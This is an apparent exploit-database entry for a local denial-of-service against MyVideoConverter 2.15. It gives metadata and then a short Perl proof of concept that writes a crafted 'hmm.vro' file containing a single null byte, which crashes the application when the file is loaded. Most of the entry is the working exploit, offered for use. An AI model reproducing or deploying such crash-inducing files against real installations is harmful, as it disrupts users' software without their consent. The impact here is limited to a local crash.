[] NeoSense

MyVideoConverter 2.15 - Local Denial of Service

Author: anonymous
type: dos
platform: windows
port: 
date_added: 2010-04-04 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comMyVideoConverter_Setup215.zip

# Exploit Title: MyVideoConverter Local DoS
# Date: April 5, 2010
# Software Link: [http://www.ivideogo.com/]
# Version: 2.15
# Tested on: Windows XP SP3
# Author: [anonymous]
#
#!/usr/bin/perl

my $file = "hmm.vro";
my $null = "\x00";

open (FILE, ">$file");
print FILE "$null";

print "Done. . . Add file -> click Start.\n"